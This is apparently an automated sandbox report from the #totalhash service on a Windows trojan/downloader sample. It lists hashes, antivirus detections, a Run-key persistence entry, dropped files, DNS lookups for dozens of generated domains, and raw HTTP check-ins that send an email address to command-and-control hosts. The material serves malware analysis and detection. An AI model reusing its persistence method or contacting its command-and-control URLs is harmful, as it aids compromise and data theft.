Analysis | #totalhash

Analysis Date	2015-01-16 22:51:55
MD5	d080f15eb2d4df1a86f03a103b3c7f95
SHA1	e38b2e5e8ea3b299d0d964b640a820ade8bc5e8e

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 6137fab4d24368e71d27641cfd8f506d sha1: 44b5ee62db5af7beedbc9adbf292a40f92f9a341 size: 120320
Section	.rdata md5: 7ae0603c9021c45fe3007556ae045568 sha1: 41531cc5d4c904c308e0404acee570b194e71362 size: 15872
Section	.data md5: 491df56201d2a885164d2cb945a75003 sha1: 63008e3aa66e686adb13558f80943f8e30c6e702 size: 17408
Timestamp	2014-01-22 06:32:58
Packer	Microsoft Visual C++ ?.?
PEhash	868f8c753ff72f05d946953fe843ba0a60e12d1f
IMPhash	6116bc9ed9a4080479cbdbcecb64520c
AV	360 Safe	no_virus
AV	Ad-Aware	Gen:Variant.Zusy.82682
AV	Alwil (avast)	Downloader-UVI [Trj]
AV	Arcabit (arcavir)	Gen:Variant.Zusy.82682
AV	Authentium	W32/Agent.NK2.gen!Eldorado
AV	Avira (antivir)	TR/Crypt.ZPACK.Gen8
AV	BullGuard	Gen:Variant.Zusy.82682
AV	CA (E-Trust Ino)	no_virus
AV	CAT (quickheal)	no_virus
AV	ClamAV	no_virus
AV	Dr. Web	Trojan.DownLoader11.7026
AV	Emsisoft	Gen:Variant.Zusy.82682
AV	Eset (nod32)	Win32/Agent.VNC
AV	Fortinet	W32/Agent.VNC!tr
AV	Frisk (f-prot)	no_virus
AV	F-Secure	Gen:Variant.Zusy.82682
AV	Grisoft (avg)	Generic_r.DMA
AV	Ikarus	Trojan.FBLock
AV	K7	no_virus
AV	Kaspersky	Trojan.Win32.Generic:Trojan.Win32.PEF.pf.silent.347637:Trojan.Win32.PEF.pf.silent.348577:Trojan.Win32.PEF.pf.silent.349247:Trojan.Win32.PEF.pf.silent.349979:Trojan.Win32.PEF.pf.silent.376163:Trojan.Win32.PEF.pf.silent.377057:Trojan.Win32.PEF.pf.silent.377789:Trojan.Win32.PEF.pf.silent.378627:Trojan.Win32.PEF.pf.silent.379268:Trojan.Win32.PEF.pf.silent.380179:Trojan.Win32.PEF.pf.silent.380996:Trojan.Win32.PEF.pf.silent.433356:Trojan.Win32.PEF.pf.silent.453058:Trojan.Win32.PEF.pf.silent.467723:Trojan.Win32.PEF.pf.silent.484872:Trojan.Win32.PEF.pf.silent.23219642:Trojan.Win32.PEF.pf.silent.23272206
AV	MalwareBytes	Trojan.Agent
AV	Mcafee	Generic-FAOV!D080F15EB2D4
AV	Microsoft Security Essentials	no_virus
AV	MicroWorld (escan)	Gen:Variant.Zusy.82682
AV	Rising	no_virus
AV	Sophos	Troj/Bckdr-RRM
AV	Symantec	no_virus
AV	Trend Micro	no_virus
AV	VirusBlokAda (vba32)	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Networking AuthIP Files ➝ C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe
Creates Process	C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe

Creates File	C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\xysrdyvxaavi.exe
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.rhaui
Creates Process	WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\hkiptxixelslzc\ugojmow.exe"

Network Details:

DNS	smokeinside.net Type: A 50.63.202.34
DNS	partybright.net Type: A 184.168.221.24
DNS	freshpeople.net Type: A 91.206.201.140
DNS	summerready.net Type: A 72.167.191.69
DNS	summerpeople.net Type: A 65.254.248.141
DNS	waterready.net Type: A 64.74.223.38
DNS	waterpeople.net Type: A 66.151.181.49
DNS	partyready.net Type: A 8.5.1.51
DNS	partypeople.net Type: A 217.138.13.211
DNS	thoughtexplain.net Type: A
DNS	waterexplain.net Type: A
DNS	thoughtbright.net Type: A
DNS	waterbright.net Type: A
DNS	thoughtinside.net Type: A
DNS	waterinside.net Type: A
DNS	womaninstead.net Type: A
DNS	smokeinstead.net Type: A
DNS	womanexplain.net Type: A
DNS	smokeexplain.net Type: A
DNS	womanbright.net Type: A
DNS	smokebright.net Type: A
DNS	womaninside.net Type: A
DNS	partyinstead.net Type: A
DNS	fightinstead.net Type: A
DNS	partyexplain.net Type: A
DNS	fightexplain.net Type: A
DNS	fightbright.net Type: A
DNS	partyinside.net Type: A
DNS	fightinside.net Type: A
DNS	freshready.net Type: A
DNS	experienceready.net Type: A
DNS	freshbrown.net Type: A
DNS	experiencebrown.net Type: A
DNS	experiencepeople.net Type: A
DNS	freshdaughter.net Type: A
DNS	experiencedaughter.net Type: A
DNS	gentlemanready.net Type: A
DNS	alreadyready.net Type: A
DNS	gentlemanbrown.net Type: A
DNS	alreadybrown.net Type: A
DNS	gentlemanpeople.net Type: A
DNS	alreadypeople.net Type: A
DNS	gentlemandaughter.net Type: A
DNS	alreadydaughter.net Type: A
DNS	followready.net Type: A
DNS	memberready.net Type: A
DNS	followbrown.net Type: A
DNS	memberbrown.net Type: A
DNS	followpeople.net Type: A
DNS	memberpeople.net Type: A
DNS	followdaughter.net Type: A
DNS	memberdaughter.net Type: A
DNS	beginready.net Type: A
DNS	knownready.net Type: A
DNS	beginbrown.net Type: A
DNS	knownbrown.net Type: A
DNS	beginpeople.net Type: A
DNS	knownpeople.net Type: A
DNS	begindaughter.net Type: A
DNS	knowndaughter.net Type: A
DNS	crowdready.net Type: A
DNS	summerbrown.net Type: A
DNS	crowdbrown.net Type: A
DNS	crowdpeople.net Type: A
DNS	summerdaughter.net Type: A
DNS	crowddaughter.net Type: A
DNS	thoughtready.net Type: A
DNS	thoughtbrown.net Type: A
DNS	waterbrown.net Type: A
DNS	thoughtpeople.net Type: A
DNS	thoughtdaughter.net Type: A
DNS	waterdaughter.net Type: A
DNS	womanready.net Type: A
DNS	smokeready.net Type: A
DNS	womanbrown.net Type: A
DNS	smokebrown.net Type: A
DNS	womanpeople.net Type: A
DNS	smokepeople.net Type: A
DNS	womandaughter.net Type: A
DNS	smokedaughter.net Type: A
DNS	fightready.net Type: A
DNS	partybrown.net Type: A
DNS	fightbrown.net Type: A
DNS	fightpeople.net Type: A
DNS	partydaughter.net Type: A
HTTP GET	http://smokeinside.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://partybright.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://freshpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://summerready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://summerpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://waterready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://waterpeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://partyready.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
HTTP GET	http://partypeople.net/forum/search.php?email=rburchfield@las-cruces.org&method=post User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 50.63.202.34:80
Flows TCP	192.168.1.1:1032 ➝ 184.168.221.24:80
Flows TCP	192.168.1.1:1033 ➝ 91.206.201.140:80
Flows TCP	192.168.1.1:1034 ➝ 72.167.191.69:80
Flows TCP	192.168.1.1:1035 ➝ 65.254.248.141:80
Flows TCP	192.168.1.1:1036 ➝ 64.74.223.38:80
Flows TCP	192.168.1.1:1037 ➝ 66.151.181.49:80
Flows TCP	192.168.1.1:1038 ➝ 8.5.1.51:80
Flows TCP	192.168.1.1:1039 ➝ 217.138.13.211:80

Raw Pcap

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2073 6d6f6b65 696e7369 64652e6e   t: smokeinside.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2070 61727479 62726967 68742e6e   t: partybright.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2066 72657368 70656f70 6c652e6e   t: freshpeople.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2073 756d6d65 72726561 64792e6e   t: summerready.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2073 756d6d65 7270656f 706c652e   t: summerpeople.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2077 61746572 72656164 792e6e65   t: waterready.ne
0x00000080 (00128)   740d0a0d 0a0d0a                       t......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2077 61746572 70656f70 6c652e6e   t: waterpeople.n
0x00000080 (00128)   65740d0a 0d0a0a                       et.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2070 61727479 72656164 792e6e65   t: partyready.ne
0x00000080 (00128)   740d0a0d 0a0a0a                       t......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 72627572   h.php?email=rbur
0x00000020 (00032)   63686669 656c6440 6c61732d 63727563   chfield@las-cruc
0x00000030 (00048)   65732e6f 7267266d 6574686f 643d706f   es.org&method=po
0x00000040 (00064)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000050 (00080)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000060 (00096)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000070 (00112)   743a2070 61727479 70656f70 6c652e6e   t: partypeople.n
0x00000080 (00128)   65740d0a 0d0a0a                       et.....

Strings

.
.
-E-
-0
-0010+-0
0
-0
CC
.00-+ 
.
-e-
. 
\
 
00
.
:\
:..
...........?- 
0
0
0
0
-
.
u
E(null)
                                 H
         (((((                  H
         h((((                  H
jjjjh
KERNEL32.DLL
mscoree.dll
TBDB
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0WWWWW
1_JXx/
1#QNAN
1#SNAN
5f>}hc
8D$:tC
8VVVVV
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
An application has made an attempt to load the C runtime library incorrectly.
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
__based(
BeginPaint
__cdecl
 Class Hierarchy Descriptor'
CloseClipboard
CloseHandle
__clrcall
CompareStringA
CompareStringW
 Complete Object Locator'
CONOUT$
`copy constructor closure'
CopyFileA
CorExitProcess
CreateDirectoryA
CreateEventA
CreateFileA
CreateIconFromResourceEx
CreateProcessA
CreateStreamOnHGlobal
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
- CRT not initialized
D$,_^][
D$$_^][
D$0_^][3
D$4UV3
@.data
dddd, MMMM dd, yyyy
D$\+D$TQ+
D$`+D$X+
December
DecodePointer
`default constructor closure'
DefWindowProcA
 delete
 delete[]
Delete
DeleteCriticalSection
DispatchMessageA
D$LPQW
D$LPSW
D$LPSWQ
DOMAIN error
DPtoLP
D$`UVW
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
EncodePointer
EndPaint
EndPath
EnterCriticalSection
ExitProcess
__fastcall
February
FF<+FF
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
ForceRemove
*_F'Qn$A
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
^F<-uB
GAIsProcessorFeaturePresent
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDesktopWindow
GetDeviceCaps
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileSize
GetFileType
GetFullPathNameA
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMapMode
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetSecurityDescriptorControl
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTimeZoneInformation
GetTitleBarInfo
GetUserNameA
GetUserObjectInformationA
GetWindowDC
GetWindowRect
GetWindowThreadProcessId
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
`h````
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtXHHt
>If90t
InitializeAcl
InitializeCriticalSectionAndSpinCount
InsertMenuA
InterlockedDecrement
InterlockedIncrement
InvalidateRect
invalid string position
IsDebuggerPresent
IsValidCodePage
JanFebMarAprMayJunJulAugSepOctNovDec
January
j@j ^V
j"^SSSSS
KERNEL32
KERNEL32.dll
/KU=Mu<?`
L$0QPj
LCMapStringA
LCMapStringW
LeaveCriticalSection
L$l_^]3
L$LQRWPP
L$LQRWS
L$LQRWVV
LoadCursorA
LoadLibraryA
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LPtoDP
L$@QRP
L$ QUV
L	t8rR
L$ VSj
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
M,\	b<
mC0^0!
MessageBoxA
-M<Fx=
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
MoveWindow
MulDiv
MultiByteToWideChar
 new[]
njYV75
NoRemove
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(null)
October
ole32.dll
OLEAUT32.dll
`omni callsig'
OpenProcess
operator
OWB'g+!
+@P1:B
__pascal
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostQuitMessage
PPPPPPPP
Process32First
Process32Next
Program: 
<program name unknown>
__ptr64
- pure virtual function call
QQSVWd
QueryPerformanceCounter
RaiseException
`.rdata
ReadFile
RegCloseKey
RegisterClassExA
RegOpenKeyA
RegSetValueExA
__restrict
RK%m<f
RtlUnwind
runtime error 
Runtime Error!
Saturday
`scalar deleting destructor'
ScaleViewportExtEx
September
SetDoubleClickTime
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetFileAttributesA
SetFilePointer
SetFocus
SetHandleCount
SetLastError
SetMapMode
SetStdHandle
SetUnhandledExceptionFilter
SetWindowTextA
ShowWindow
SING error
SPSSSh
s[S;7|G;w
^SSSSS
__stdcall
`string'
string too long
Sunday
SunMonTueWedThuFriSat
T$0jXW
t$4WPQ
T$8RPW
t$$9-X_B
TerminateProcess
tGHt.Ht&
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
\)T"Hk
T$hQPR
Thursday
< tK<	tG
TLOSS error
T$LRPW
T$LRSWVV
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
<\tM</tI
T$PPQRS
tR99u2
TranslateMessage
T$ RQQj
T$\RVPW
t"SS9]
<+t(<-t$:
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
 Type Descriptor'
`typeof'
>:u8FV
`udt returning'
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
Unknown exception
UpdateWindow
UQPXY]Y[
URPQQh,
USER32.dll
USER32.DLL
u[SSSP
UTF-16LE
v$;5,oB
`vbase destructor'
`vbtable'
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
`virtual displacement map'
VirtualFree
v	N+D$
#VVv\t
_VVVVV
VVVVVQRSSj
WaitForSingleObject
Wednesday
WideCharToMultiByte
WriteConsoleA
WriteConsoleW
WriteFile
WS2_32.dll
^WWWWW
XB,@XMv
xppwpp
xpxxxx
<xtX<XtT
>=Yt1j
|ZJ,i{[h